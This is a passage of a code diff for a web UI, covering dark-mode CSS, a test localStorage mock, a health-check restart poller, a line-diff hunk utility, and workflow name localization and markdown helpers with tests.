+.dark .hover\:text-red-900:hover,
+.dark .hover\:text-green-700:hover,
+.dark .hover\:text-green-800:hover,
+.dark .hover\:text-green-900:hover,
+.dark .hover\:text-emerald-700:hover,
+.dark .hover\:text-emerald-900:hover,
+.dark .hover\:text-purple-700:hover,
+.dark .hover\:text-violet-700:hover,
+.dark .hover\:text-teal-700:hover,
+.dark .hover\:text-cyan-700:hover,
+.dark .hover\:text-indigo-700:hover,
+.dark .hover\:text-pink-700:hover,
+.dark .hover\:text-rose-500:hover,
+.dark .hover\:text-rose-600:hover,
+.dark .hover\:text-rose-700:hover {
+  color: #ffffff;
+}
+
+.dark .group:hover .group-hover\:text-gray-500,
+.dark .group:hover .group-hover\:text-zinc-400,
+.dark .group:hover .group-hover\:text-zinc-500,
+.dark .group:hover .group-hover\:text-zinc-800,
+.dark .group:hover .group-hover\:text-slate-700,
+.dark .group:hover .group-hover\:text-zinc-900,
+.dark .group\/sec:hover .group-hover\/sec\:text-zinc-900,
+.dark .group\/name:hover .group-hover\/name\:text-slate-700,
+.dark .group\/name:hover .group-hover\/name\:text-blue-700,
+.dark .group\/name:hover .group-hover\/name\:text-purple-700 {
+  color: #ffffff;
+}
+
+.dark .group:hover .dark\:group-hover\:text-zinc-100,
+.dark .group:hover .dark\:group-hover\:text-zinc-300 {
+  color: #ffffff;
+}
+
+.dark .group:hover .group-hover\:text-rose-400,
+.dark .group:hover .group-hover\:text-sky-400,
+.dark .group:hover .group-hover\:text-violet-400,
+.dark .group:hover .group-hover\:text-emerald-400,
+.dark .group:hover .group-hover\:text-blue-400,
+.dark .group:hover .group-hover\:text-blue-500,
+.dark .group:hover .group-hover\:text-amber-500 {
+  color: var(--flocks-dark-text);
+}
+
+.dark .shadow,
+.dark .shadow-sm,
+.dark .shadow-md,
+.dark .shadow-lg,
+.dark .shadow-xl,
+.dark .shadow-2xl {
+  --tw-shadow-color: rgb(0 0 0 / 0.28);
+  box-shadow: var(--flocks-dark-shadow);
+}
+
+.dark .dark\:shadow-black\/10,
+.dark .dark\:shadow-black\/20,
+.dark .dark\:shadow-black\/30,
+.dark .dark\:shadow-black\/40 {
+  --tw-shadow-color: rgb(28 33 40 / 0.32);
+  box-shadow: var(--flocks-dark-shadow);
+}
+
+.dark .hover\:shadow:hover,
+.dark .hover\:shadow-sm:hover,
+.dark .hover\:shadow-md:hover,
+.dark .hover\:shadow-lg:hover {
+  --tw-shadow-color: rgb(0 0 0 / 0.32);
+  box-shadow: var(--flocks-dark-shadow);
+}
+
+.dark .shadow-none,
+.dark .hover\:shadow-none:hover {
+  box-shadow: none;
+}
+
+.dark .ring-white,
+.dark .ring-gray-100,
+.dark .ring-zinc-100,
+.dark .ring-slate-100,
+.dark .ring-gray-200,
+.dark .ring-zinc-200,
+.dark .ring-slate-200,
+.dark .dark\:ring-zinc-950,
+.dark .dark\:ring-gray-950,
+.dark .dark\:ring-slate-950 {
+  --tw-ring-color: var(--flocks-dark-border);
+}
+
+.dark .focus\:ring-gray-100:focus,
+.dark .focus\:ring-zinc-100:focus,
+.dark .focus\:ring-slate-100:focus,
+.dark .focus\:ring-gray-200:focus,
+.dark .focus\:ring-zinc-200:focus,
+.dark .focus\:ring-slate-200:focus,
+.dark .focus-within\:ring-gray-100:focus-within,
+.dark .focus-within\:ring-zinc-100:focus-within,
+.dark .focus-within\:ring-slate-100:focus-within {
+  --tw-ring-color: rgb(90 101 115 / 0.72);
+}
+
+.dark .focus\:ring-slate-400:focus,
+.dark .focus\:ring-slate-300:focus,
+.dark .focus\:ring-gray-400:focus,
+.dark .focus\:ring-zinc-400:focus,
+.dark .focus\:ring-red-300:focus,
+.dark .focus\:ring-red-400:focus,
+.dark .focus\:ring-red-400\/50:focus,
+.dark .focus\:ring-red-500:focus,
+.dark .focus\:ring-blue-100:focus,
+.dark .focus\:ring-blue-300:focus,
+.dark .focus\:ring-blue-400:focus,
+.dark .focus\:ring-green-300:focus,
+.dark .focus\:ring-green-400:focus,
+.dark .focus\:ring-purple-100:focus,
+.dark .focus\:ring-purple-500:focus,
+.dark .focus\:ring-violet-500:focus,
+.dark .focus\:ring-pink-500:focus,
+.dark .focus\:ring-teal-500:focus,
+.dark .focus\:ring-orange-400:focus,
+.dark .focus\:ring-orange-500:focus,
+.dark .focus\:ring-emerald-100:focus,
+.dark .focus-within\:ring-red-100:focus-within,
+.dark .focus-within\:ring-red-500:focus-within,
+.dark .focus-within\:ring-zinc-300:focus-within {
+  --tw-ring-color: rgb(90 101 115 / 0.72);
+}
+
+.dark .ring-red-200,
+.dark .ring-red-300,
+.dark .ring-red-400,
+.dark .ring-slate-200,
+.dark .ring-slate-400,
+.dark .ring-green-400,
+.dark .ring-yellow-400,
+.dark .ring-orange-400,
+.dark .ring-purple-400,
+.dark .ring-violet-400,
+.dark .ring-pink-400,
+.dark .ring-teal-400 {
+  --tw-ring-color: rgb(90 101 115 / 0.72);
+}
+
+.dark .ring-offset-1,
+.dark .ring-offset-2,
+.dark .focus\:ring-offset-0:focus,
+.dark .focus\:ring-offset-1:focus {
+  --tw-ring-offset-color: var(--flocks-dark-app);
+}
+
+.dark .focus-visible\:outline-sky-500:focus-visible {
+  outline-color: rgb(83 155 245 / 0.78);
+}
+
+.dark input,
+.dark textarea,
+.dark select {
+  background-color: var(--flocks-dark-surface);
+  border-color: var(--flocks-dark-border-strong);
+  color: var(--flocks-dark-text);
+}
+
+.dark textarea.bg-transparent {
+  background-color: transparent !important;
+  border-color: transparent !important;
+  box-shadow: none !important;
+}
+
+.dark input::placeholder,
+.dark textarea::placeholder {
+  color: var(--flocks-dark-placeholder) !important;
+  opacity: 1;
+}
+
+.dark .placeholder-gray-300::placeholder,
+.dark .placeholder-zinc-300::placeholder,
+.dark .placeholder-slate-300::placeholder,
+.dark .placeholder-gray-400::placeholder,
+.dark .placeholder-zinc-400::placeholder,
+.dark .placeholder-slate-400::placeholder {
+  color: var(--flocks-dark-placeholder) !important;
+  opacity: 1;
+}
+
+.dark .dark\:placeholder\:text-zinc-500::placeholder,
+.dark .dark\:placeholder\:text-zinc-600::placeholder,
+.dark .dark\:placeholder\:text-gray-500::placeholder,
+.dark .dark\:placeholder\:text-gray-600::placeholder {
+  color: var(--flocks-dark-placeholder) !important;
+  opacity: 1;
+}
+
+.dark input:focus,
+.dark textarea:focus,
+.dark select:focus {
+  border-color: var(--flocks-dark-border-strong);
+  box-shadow: 0 0 0 3px rgb(83 155 245 / 0.12);
+}
+
+.dark textarea.bg-transparent:focus {
+  border-color: transparent !important;
+  box-shadow: none !important;
+}
+
+.dark * {
+  scrollbar-color: #5a6573 #252c35 !important;
+}
+
+.dark *::-webkit-scrollbar {
+  width: 10px;
+  height: 10px;
+}
+
+.dark *::-webkit-scrollbar-track {
+  background: #252c35;
+}
+
+.dark *::-webkit-scrollbar-thumb {
+  background: #5a6573;
+  border: 2px solid #252c35;
+  border-radius: 999px;
+}
+
+.dark *::-webkit-scrollbar-thumb:hover {
+  background: #687584;
+}
+
+.dark table {
+  color: var(--flocks-dark-text-muted);
+}
+
+.dark thead,
+.dark .prose thead {
+  background-color: var(--flocks-dark-surface-soft);
+}
+
+.dark tbody tr:hover,
+.dark .hover\:bg-gray-50:hover,
+.dark .hover\:bg-zinc-50:hover {
+  background-color: var(--flocks-dark-surface-raised);
+}
+
+.dark code,
+.dark .prose code {
+  background-color: var(--flocks-dark-surface-raised);
+  color: var(--flocks-dark-text);
+}
+
+.dark pre,
+.dark .prose pre {
+  background-color: #20262d;
+  border: 1px solid var(--flocks-dark-border);
+  color: var(--flocks-dark-text);
+}
+
+.dark .prose {
+  --tw-prose-body: var(--flocks-dark-text-muted);
+  --tw-prose-headings: var(--flocks-dark-text);
+  --tw-prose-lead: var(--flocks-dark-text-muted);
+  --tw-prose-links: #6cb6ff;
+  --tw-prose-bold: var(--flocks-dark-text);
+  --tw-prose-counters: var(--flocks-dark-text-subtle);
+  --tw-prose-bullets: var(--flocks-dark-text-subtle);
+  --tw-prose-hr: var(--flocks-dark-border);
+  --tw-prose-quotes: var(--flocks-dark-text);
+  --tw-prose-quote-borders: var(--flocks-dark-border-strong);
+  --tw-prose-captions: var(--flocks-dark-text-subtle);
+  --tw-prose-code: var(--flocks-dark-text);
+  --tw-prose-pre-code: var(--flocks-dark-text);
+  --tw-prose-pre-bg: #20262d;
+  --tw-prose-th-borders: var(--flocks-dark-border-strong);
+  --tw-prose-td-borders: var(--flocks-dark-border);
+  color: var(--flocks-dark-text-muted);
+}
+
+.dark .prose h1,
+.dark .prose h2,
+.dark .prose h3,
+.dark .prose h4,
+.dark .prose strong {
+  color: var(--flocks-dark-text);
+}
+
+.dark .prose h2,
+.dark .prose hr,
+.dark .prose th,
+.dark .prose td,
+.dark .prose details,
+.dark .prose details[open] summary {
+  border-color: var(--flocks-dark-border);
+}
+
+.dark .prose th,
+.dark .prose td {
+  color: var(--flocks-dark-text-muted);
+}
+
+.dark .prose tr:nth-child(even) td,
+.dark .prose details summary {
+  background-color: var(--flocks-dark-surface-soft);
+}
+
+.dark .prose details summary {
+  color: var(--flocks-dark-text-muted);
+}
+
+.dark .prose details summary:hover {
+  background-color: var(--flocks-dark-surface-raised);
+}
+
+.dark .prose a {
+  color: #6cb6ff;
+}
+
+.dark .react-flow,
+.dark .react-flow__renderer,
+.dark .react-flow__pane {
+  background-color: var(--flocks-dark-app);
+  color: var(--flocks-dark-text);
+}
+
+.dark .react-flow__node {
+  color: var(--flocks-dark-text);
+}
+
+.dark .react-flow__attribution {
+  background-color: rgb(48 56 66 / 0.86);
+  color: var(--flocks-dark-text-subtle);
+}
+
+.dark .react-flow__controls {
+  border: 1px solid var(--flocks-dark-border);
+  background-color: var(--flocks-dark-surface);
+  box-shadow: var(--flocks-dark-shadow);
+}
+
+.dark .react-flow__controls-button {
+  border-bottom-color: var(--flocks-dark-border);
+  background-color: var(--flocks-dark-surface);
+  color: var(--flocks-dark-text-muted);
+}
+
+.dark .react-flow__controls-button:hover {
+  background-color: var(--flocks-dark-surface-raised);
+  color: var(--flocks-dark-text);
+}
+
+.dark .react-flow__controls-button svg {
+  fill: currentColor;
+}
+
+.dark .react-flow__minimap {
+  border: 1px solid var(--flocks-dark-border) !important;
+  background-color: var(--flocks-dark-surface) !important;
+  box-shadow: var(--flocks-dark-shadow);
+}
+
+.device-room-actions-fade {
+  --device-room-action-fade: #f4f4f5;
+  background: linear-gradient(to right, transparent, var(--device-room-action-fade) 35%);
+}
+
+.device-room-actions-fade[data-selected='true'] {
+  --device-room-action-fade: #eff6ff;
+}
+
+.dark .device-room-actions-fade {
+  --device-room-action-fade: var(--flocks-dark-surface-soft);
+}
+
+.dark .device-room-actions-fade[data-selected='true'] {
+  --device-room-action-fade: rgb(37 99 235 / 0.16);
+}
diff --git a/webui/src/test/setup.ts b/webui/src/test/setup.ts
index dcd0df72f..b014e0cb2 100644
--- a/webui/src/test/setup.ts
+++ b/webui/src/test/setup.ts
@@ -2,6 +2,43 @@ import '@testing-library/jest-dom/vitest';
 import { cleanup } from '@testing-library/react';
 import { afterEach } from 'vitest';
 
+function createStorageMock(): Storage {
+  let store: Record<string, string> = {};
+
+  return {
+    get length() {
+      return Object.keys(store).length;
+    },
+    clear() {
+      store = {};
+    },
+    getItem(key: string) {
+      return Object.prototype.hasOwnProperty.call(store, key) ? store[key] : null;
+    },
+    key(index: number) {
+      return Object.keys(store)[index] ?? null;
+    },
+    removeItem(key: string) {
+      delete store[key];
+    },
+    setItem(key: string, value: string) {
+      store[key] = String(value);
+    },
+  };
+}
+
+if (typeof globalThis.localStorage?.clear !== 'function') {
+  const storage = createStorageMock();
+  Object.defineProperty(globalThis, 'localStorage', {
+    value: storage,
+    configurable: true,
+  });
+  Object.defineProperty(window, 'localStorage', {
+    value: storage,
+    configurable: true,
+  });
+}
+
 afterEach(() => {
   cleanup();
 });
@@ -15,4 +52,4 @@ global.ResizeObserver = class ResizeObserver {
 global.MutationObserver = class MutationObserver {
   observe() {}
   disconnect() {}
-};
\ No newline at end of file
+};
diff --git a/webui/src/types/index.ts b/webui/src/types/index.ts
index e7d7b6d03..eb584929d 100644
--- a/webui/src/types/index.ts
+++ b/webui/src/types/index.ts
@@ -25,6 +25,13 @@ export interface Session {
   canWrite?: boolean;
   canDelete?: boolean;
   isShared?: boolean;
+  goal?: SessionGoalState | null;
+}
+
+export interface SessionGoalState {
+  status: 'active' | 'completed' | 'blocked' | 'paused';
+  objective: string;
+  reason?: string | null;
 }
 
 export interface SessionTime {
@@ -109,6 +116,7 @@ export interface MessagePart {
   text?: string;
   synthetic?: boolean;
   ignored?: boolean;
+  metadata?: Record<string, any>;
   // Tool part
   tool?: string;
   callID?: string;
diff --git a/webui/src/utils/agentDisplay.ts b/webui/src/utils/agentDisplay.ts
index a511ff66b..075251707 100644
--- a/webui/src/utils/agentDisplay.ts
+++ b/webui/src/utils/agentDisplay.ts
@@ -30,3 +30,12 @@ export function getAgentDisplayName(
   const cn = (agent.nameCn ?? '').trim();
   return isChineseLocale(language) ? (cn || en) : en;
 }
+
+export function isAgentUsableInChat(
+  agent: { mode?: string; hidden?: boolean; delegatable?: boolean; tags?: string[] } | null | undefined,
+): boolean {
+  if (!agent || agent.hidden) return false;
+  if ((agent.tags ?? []).includes('system')) return false;
+  if (agent.mode === 'primary') return true;
+  return agent.delegatable !== false;
+}
diff --git a/webui/src/utils/restartPolling.ts b/webui/src/utils/restartPolling.ts
new file mode 100644
index 000000000..574098690
--- /dev/null
+++ b/webui/src/utils/restartPolling.ts
@@ -0,0 +1,57 @@
+const UPGRADE_PAGE_MARKER = 'flocks-upgrade-in-progress';
+
+export interface RestartReadiness {
+  ready: boolean;
+  reason?: string;
+}
+
+function errorMessage(error: unknown): string {
+  if (error instanceof Error && error.message) return error.message;
+  if (typeof error === 'string' && error) return error;
+  return 'request failed';
+}
+
+async function readUpgradePageState(): Promise<string | null> {
+  try {
+    const rootResponse = await fetch('/', { cache: 'no-store' });
+    if (!rootResponse.ok) {
+      return `root page returned HTTP ${rootResponse.status}`;
+    }
+
+    const rootHtml = await rootResponse.text();
+    if (rootHtml.includes(UPGRADE_PAGE_MARKER)) {
+      return 'upgrade handover page is still active';
+    }
+  } catch (error) {
+    return `root page check failed: ${errorMessage(error)}`;
+  }
+
+  return null;
+}
+
+export async function checkRestartReadiness(): Promise<RestartReadiness> {
+  try {
+    const healthResponse = await fetch('/api/health', { cache: 'no-store' });
+    if (healthResponse.ok) {
+      return { ready: true };
+    }
+
+    const pageReason = await readUpgradePageState();
+    return {
+      ready: false,
+      reason: [
+        `health check returned HTTP ${healthResponse.status}`,
+        pageReason,
+      ].filter(Boolean).join('; '),
+    };
+  } catch (error) {
+    const pageReason = await readUpgradePageState();
+    return {
+      ready: false,
+      reason: [
+        `health check failed: ${errorMessage(error)}`,
+        pageReason,
+      ].filter(Boolean).join('; '),
+    };
+  }
+}
diff --git a/webui/src/utils/textDiff.test.ts b/webui/src/utils/textDiff.test.ts
new file mode 100644
index 000000000..df3a7c49d
--- /dev/null
+++ b/webui/src/utils/textDiff.test.ts
@@ -0,0 +1,30 @@
+import { describe, expect, it } from 'vitest';
+
+import {
+  acceptTextDiffHunk,
+  buildLineDiff,
+  buildTextDiffHunks,
+  rejectTextDiffHunk,
+} from './textDiff';
+
+describe('buildLineDiff', () => {
+  it('keeps context lines and marks additions and removals in order', () => {
+    expect(buildLineDiff('a\nb\nc\n', 'a\nx\nc\nd\n')).toEqual([
+      { type: 'context', oldLine: 1, newLine: 1, text: 'a' },
+      { type: 'remove', oldLine: 2, text: 'b' },
+      { type: 'add', newLine: 2, text: 'x' },
+      { type: 'context', oldLine: 3, newLine: 3, text: 'c' },
+      { type: 'add', newLine: 4, text: 'd' },
+    ]);
+  });
+
+  it('builds hunks and can accept or reject one hunk at a time', () => {
+    const before = 'old title\n\nkeep\n\nold tail\n';
+    const after = 'new title\n\nkeep\n\nnew tail\n';
+    const hunks = buildTextDiffHunks(before, after);
+
+    expect(hunks).toHaveLength(2);
+    expect(acceptTextDiffHunk(before, hunks[0])).toBe('new title\n\nkeep\n\nold tail\n');
+    expect(rejectTextDiffHunk(after, hunks[0])).toBe('old title\n\nkeep\n\nnew tail\n');
+  });
+});
diff --git a/webui/src/utils/textDiff.ts b/webui/src/utils/textDiff.ts
new file mode 100644
index 000000000..1e298afde
--- /dev/null
+++ b/webui/src/utils/textDiff.ts
@@ -0,0 +1,199 @@
+export type TextDiffLineType = 'context' | 'add' | 'remove';
+
+export interface TextDiffLine {
+  type: TextDiffLineType;
+  oldLine?: number;
+  newLine?: number;
+  text: string;
+}
+
+export interface TextDiffHunk {
+  id: string;
+  lines: TextDiffLine[];
+  changeStartLineIndex: number;
+  changeEndLineIndex: number;
+  oldStartIndex: number;
+  oldEndIndex: number;
+  newStartIndex: number;
+  newEndIndex: number;
+  oldLines: string[];
+  newLines: string[];
+  added: number;
+  removed: number;
+}
+
+function splitLines(text: string): string[] {
+  const normalized = text.replace(/\r\n/g, '\n').replace(/\r/g, '\n');
+  if (!normalized) return [];
+  const lines = normalized.split('\n');
+  if (lines[lines.length - 1] === '') {
+    lines.pop();
+  }
+  return lines;
+}
+
+function joinLines(lines: string[], keepTrailingNewline: boolean): string {
+  const joined = lines.join('\n');
+  if (!joined) return keepTrailingNewline && lines.length > 0 ? '\n' : '';
+  return keepTrailingNewline ? `${joined}\n` : joined;
+}
+
+export function buildLineDiff(before: string, after: string): TextDiffLine[] {
+  const oldLines = splitLines(before);
+  const newLines = splitLines(after);
+  const oldCount = oldLines.length;
+  const newCount = newLines.length;
+  const lcs = Array.from({ length: oldCount + 1 }, () => Array<number>(newCount + 1).fill(0));
+
+  for (let oldIndex = oldCount - 1; oldIndex >= 0; oldIndex -= 1) {
+    for (let newIndex = newCount - 1; newIndex >= 0; newIndex -= 1) {
+      if (oldLines[oldIndex] === newLines[newIndex]) {
+        lcs[oldIndex][newIndex] = lcs[oldIndex + 1][newIndex + 1] + 1;
+      } else {
+        lcs[oldIndex][newIndex] = Math.max(lcs[oldIndex + 1][newIndex], lcs[oldIndex][newIndex + 1]);
+      }
+    }
+  }
+
+  const result: TextDiffLine[] = [];
+  let oldIndex = 0;
+  let newIndex = 0;
+
+  while (oldIndex < oldCount && newIndex < newCount) {
+    if (oldLines[oldIndex] === newLines[newIndex]) {
+      result.push({
+        type: 'context',
+        oldLine: oldIndex + 1,
+        newLine: newIndex + 1,
+        text: oldLines[oldIndex],
+      });
+      oldIndex += 1;
+      newIndex += 1;
+    } else if (lcs[oldIndex + 1][newIndex] >= lcs[oldIndex][newIndex + 1]) {
+      result.push({
+        type: 'remove',
+        oldLine: oldIndex + 1,
+        text: oldLines[oldIndex],
+      });
+      oldIndex += 1;
+    } else {
+      result.push({
+        type: 'add',
+        newLine: newIndex + 1,
+        text: newLines[newIndex],
+      });
+      newIndex += 1;
+    }
+  }
+
+  while (oldIndex < oldCount) {
+    result.push({
+      type: 'remove',
+      oldLine: oldIndex + 1,
+      text: oldLines[oldIndex],
+    });
+    oldIndex += 1;
+  }
+
+  while (newIndex < newCount) {
+    result.push({
+      type: 'add',
+      newLine: newIndex + 1,
+      text: newLines[newIndex],
+    });
+    newIndex += 1;
+  }
+
+  return result;
+}
+
+export function buildTextDiffHunks(
+  before: string,
+  after: string,
+  contextLines = 2,
+): TextDiffHunk[] {
+  const diffLines = buildLineDiff(before, after);
+  const oldLines = splitLines(before);
+  const newLines = splitLines(after);
+  const hunks: TextDiffHunk[] = [];
+
+  let oldCursor = 0;
+  let newCursor = 0;
+  let changeStartLineIndex: number | null = null;
+  let oldStartIndex = 0;
+  let newStartIndex = 0;
+
+  const pushHunk = (changeEndLineIndex: number) => {
+    if (changeStartLineIndex === null) return;
+
+    const oldEndIndex = oldCursor;
+    const newEndIndex = newCursor;
+    const displayStart = Math.max(0, changeStartLineIndex - contextLines);
+    const displayEnd = Math.min(diffLines.length, changeEndLineIndex + contextLines);
+    const lines = diffLines.slice(displayStart, displayEnd);
+    const removed = lines.filter((line) => line.type === 'remove').length;
+    const added = lines.filter((line) => line.type === 'add').length;
+
+    hunks.push({
+      id: `hunk-${hunks.length + 1}-${oldStartIndex}-${newStartIndex}`,
+      lines,
+      changeStartLineIndex,
+      changeEndLineIndex,
+      oldStartIndex,
+      oldEndIndex,
+      newStartIndex,
+      newEndIndex,
+      oldLines: oldLines.slice(oldStartIndex, oldEndIndex),
+      newLines: newLines.slice(newStartIndex, newEndIndex),
+      added,
+      removed,
+    });
+
+    changeStartLineIndex = null;
+  };
+
+  diffLines.forEach((line, index) => {
+    if (line.type === 'context') {
+      pushHunk(index);
+      oldCursor += 1;
+      newCursor += 1;
+      return;
+    }
+
+    if (changeStartLineIndex === null) {
+      changeStartLineIndex = index;
+      oldStartIndex = oldCursor;
+      newStartIndex = newCursor;
+    }
+
+    if (line.type === 'remove') {
+      oldCursor += 1;
+    } else {
+      newCursor += 1;
+    }
+  });
+
+  pushHunk(diffLines.length);
+
+  return hunks;
+}
+
+export function acceptTextDiffHunk(before: string, hunk: TextDiffHunk): string {
+  const beforeLines = splitLines(before);
+  beforeLines.splice(
+    hunk.oldStartIndex,
+    hunk.oldEndIndex - hunk.oldStartIndex,
+    ...hunk.newLines,
+  );
+  return joinLines(beforeLines, before.endsWith('\n'));
+}
+
+export function rejectTextDiffHunk(after: string, hunk: TextDiffHunk): string {
+  const afterLines = splitLines(after);
+  afterLines.splice(
+    hunk.newStartIndex,
+    hunk.newEndIndex - hunk.newStartIndex,
+    ...hunk.oldLines,
+  );
+  return joinLines(afterLines, after.endsWith('\n'));
+}
diff --git a/webui/src/utils/workflowDisplay.test.ts b/webui/src/utils/workflowDisplay.test.ts
new file mode 100644
index 000000000..4e622949f
--- /dev/null
+++ b/webui/src/utils/workflowDisplay.test.ts
@@ -0,0 +1,67 @@
+import { describe, expect, it } from 'vitest';
+
+import type { Workflow } from '@/api/workflow';
+import { getWorkflowDisplayName } from './workflowDisplay';
+
+function makeWorkflow(overrides: Partial<Workflow> = {}): Workflow {
+  return {
+    id: 'wf-1',
+    name: 'stable_workflow_name',
+    category: 'default',
+    workflowJson: {
+      start: '',
+      nodes: [],
+      edges: [],
+    },
+    status: 'draft',
+    createdAt: 0,
+    updatedAt: 0,
+    stats: {
+      callCount: 0,
+      successCount: 0,
+      errorCount: 0,
+      totalRuntime: 0,
+      avgRuntime: 0,
+      thumbsUp: 0,
+      thumbsDown: 0,
+    },
+    ...overrides,
+  };
+}
+
+describe('getWorkflowDisplayName', () => {
+  it('uses localized workflow response names for the active language', () => {
+    const workflow = makeWorkflow({
+      nameI18n: {
+        'zh-CN': '中文工作流名称',
+        'en-US': 'English Workflow Name',
+      },
+    });
+
+    expect(getWorkflowDisplayName(workflow, 'zh-CN')).toBe('中文工作流名称');
+    expect(getWorkflowDisplayName(workflow, 'en-US')).toBe('English Workflow Name');
+  });
+
+  it('can read names from workflow metadata', () => {
+    const workflow = makeWorkflow({
+      workflowJson: {
+        start: '',
+        nodes: [],
+        edges: [],
+        metadata: {
+          nameI18n: {
+            zh: '元数据中文名',
+            en: 'Metadata English Name',
+          },
+        },
+      },
+    });
+
+    expect(getWorkflowDisplayName(workflow, 'zh-Hans')).toBe('元数据中文名');
+    expect(getWorkflowDisplayName(workflow, 'en')).toBe('Metadata English Name');
+  });
+
+  it('falls back to stable name when no localized name exists', () => {
+    expect(getWorkflowDisplayName(makeWorkflow(), 'zh-CN')).toBe('stable_workflow_name');
+  });
+});
diff --git a/webui/src/utils/workflowDisplay.ts b/webui/src/utils/workflowDisplay.ts
new file mode 100644
index 000000000..49d962beb
--- /dev/null
+++ b/webui/src/utils/workflowDisplay.ts
@@ -0,0 +1,79 @@
+import type { Workflow } from '@/api/workflow';
+
+type LocalizedNameSource = Record<string, unknown> | null | undefined;
+
+function isChineseLocale(language?: string): boolean {
+  if (!language) return false;
+  return language.toLowerCase().replace('_', '-').startsWith('zh');
+}
+
+function localizedNamesFrom(value: LocalizedNameSource): Record<string, string> {
+  if (!value || typeof value !== 'object') return {};
+
+  const names: Record<string, string> = {};
+  Object.entries(value).forEach(([key, item]) => {
+    const locale = key.trim();
+    const name = typeof item === 'string' ? item.trim() : '';
+    if (locale && name) {
+      names[locale] = name;
+    }
+  });
+  return names;
+}
+
+function collectLocalizedNames(workflow: Workflow | null | undefined): Record<string, string> {
+  if (!workflow) return {};
+  const raw = workflow as Workflow & Record<string, unknown>;
+  const workflowJson = workflow.workflowJson as unknown as Record<string, unknown> | undefined;
+  const metadata = workflow.workflowJson?.metadata as Record<string, unknown> | undefined;
+  const names: Record<string, string> = {};
+
+  [
+    raw.nameI18n,
+    raw.names,
+    raw.localizedNames,
+    raw.displayNames,
+    workflowJson?.nameI18n,
+    workflowJson?.names,
+    workflowJson?.localizedNames,
+    workflowJson?.displayNames,
+    metadata?.nameI18n,
+    metadata?.names,
+    metadata?.localizedNames,
+    metadata?.displayNames,
+  ].forEach((source) => {
+    Object.assign(names, localizedNamesFrom(source as LocalizedNameSource));
+  });
+
+  const directAliases: Record<string, string[]> = {
+    'zh-CN': ['nameZh', 'nameCn', 'zhName', 'cnName'],
+    'en-US': ['nameEn', 'enName'],
+  };
+  Object.entries(directAliases).forEach(([locale, aliases]) => {
+    for (const alias of aliases) {
+      const value = raw[alias] ?? workflowJson?.[alias] ?? metadata?.[alias];
+      if (typeof value === 'string' && value.trim()) {
+        names[locale] = names[locale] || value.trim();
+        break;
+      }
+    }
+  });
+
+  return names;
+}
+
+function pickLocalizedName(names: Record<string, string>, language?: string): string {
+  if (isChineseLocale(language)) {
+    return names['zh-CN'] || names['zh_CN'] || names.zh || names.cn || '';
+  }
+  return names['en-US'] || names.en_US || names.en || '';
+}
+
+export function getWorkflowDisplayName(
+  workflow: Workflow | null | undefined,
+  language?: string,
+): string {
+  if (!workflow) return '';
+  const localized = pickLocalizedName(collectLocalizedNames(workflow), language);
+  return localized || workflow.name?.trim() || workflow.id;
+}
diff --git a/webui/src/utils/workflowMarkdown.ts b/webui/src/utils/workflowMarkdown.ts
new file mode 100644
index 000000000..b635c210d
--- /dev/null
+++ b/webui/src/utils/workflowMarkdown.ts
@@ -0,0 +1,290 @@
+import type { Workflow, WorkflowEdge, WorkflowJSON, WorkflowNode, WorkflowTrigger } from '@/api/workflow';
+
+const NODE_TYPE_LABELS: Record<string, string> = {
+  python: 'Python',
+  logic: '逻辑',
+  branch: '分支',
+  loop: '循环',
+  tool: '工具',
+  llm: 'LLM',
+  http_request: 'HTTP',
+  subworkflow: '子工作流',
+};
+
+function cleanText(value?: string | null): string {
+  return (value || '').replace(/\s+/g, ' ').trim();
+}
+
+function tableCell(value: unknown): string {
+  const text = value === undefined || value === null || value === ''
+    ? '-'
+    : String(value);
+  return text.replace(/\|/g, '\\|').replace(/\n+/g, '<br>');
+}
+
+function formatList(items: string[]): string {
+  const useful = items.map(cleanText).filter(Boolean);
+  return useful.length > 0 ? useful.join('、') : '-';
+}
+
+function nodeLabel(node?: WorkflowNode): string {
+  if (!node) return '-';
+  return `${node.id} (${NODE_TYPE_LABELS[node.type] || node.type})`;
+}
+
+function summarizeDescription(text?: string): string {
+  const value = cleanText(text);
+  if (!value) return '暂无描述。';
+  return value;
+}
+
+function outgoingEdges(nodeId: string, edges: WorkflowEdge[]): WorkflowEdge[] {
+  return edges
+    .filter((edge) => edge.from === nodeId)
+    .sort((a, b) => (a.order ?? 0) - (b.order ?? 0));
+}
+
+function incomingEdges(nodeId: string, edges: WorkflowEdge[]): WorkflowEdge[] {
+  return edges
+    .filter((edge) => edge.to === nodeId)
+    .sort((a, b) => (a.order ?? 0) - (b.order ?? 0));
+}
+
+function describeEdge(edge: WorkflowEdge): string {
+  const extras: string[] = [];
+  if (edge.label) extras.push(`分支: ${edge.label}`);
+  if (edge.mapping && Object.keys(edge.mapping).length > 0) {
+    extras.push(`映射: ${Object.entries(edge.mapping).map(([k, v]) => `${k} <- ${v}`).join(', ')}`);
+  }
+  if (edge.const && Object.keys(edge.const).length > 0) {
+    extras.push(`常量: ${Object.entries(edge.const).map(([k, v]) => `${k}=${JSON.stringify(v)}`).join(', ')}`);
+  }
+  return extras.length > 0 ? `${edge.from} -> ${edge.to} (${extras.join('; ')})` : `${edge.from} -> ${edge.to}`;
+}
+
+function buildLinearFlow(workflowJson: WorkflowJSON): string[] {
+  const nodesById = new Map(workflowJson.nodes.map((node) => [node.id, node]));
+  const visited = new Set<string>();
+  const result: string[] = [];
+  let current = workflowJson.start || workflowJson.nodes[0]?.id;
+
+  while (current && !visited.has(current)) {
+    const node = nodesById.get(current);
+    if (!node) break;
+    visited.add(current);
+    result.push(node.id);
+    const next = outgoingEdges(current, workflowJson.edges)[0]?.to;
+    current = next;
+  }
+
+  workflowJson.nodes.forEach((node) => {
+    if (!visited.has(node.id)) result.push(node.id);
+  });
+
+  return result;
+}
+
+function describeNodeInputs(node: WorkflowNode, workflowJson: WorkflowJSON): string {
+  const incoming = incomingEdges(node.id, workflowJson.edges);
+  if (node.id === workflowJson.start || incoming.length === 0) return '工作流输入 / 触发器输入';
+  return incoming.map((edge) => edge.from).join('、');
+}
+
+function describeNodeOutputs(node: WorkflowNode, workflowJson: WorkflowJSON): string {
+  const outgoing = outgoingEdges(node.id, workflowJson.edges);
+  if (outgoing.length === 0) return '工作流最终输出';
+  return outgoing.map((edge) => edge.to).join('、');
+}
+
+function inferEditFocus(node: WorkflowNode): string {
+  const haystack = `${node.id} ${node.description || ''}`.toLowerCase();
+  if (haystack.includes('dedup') || haystack.includes('minhash') || haystack.includes('lsh')) {
+    return '修改去重阈值、状态保存、结果落盘路径或输出格式时，优先编辑这里。';
+  }
+  if (haystack.includes('normalize')) {
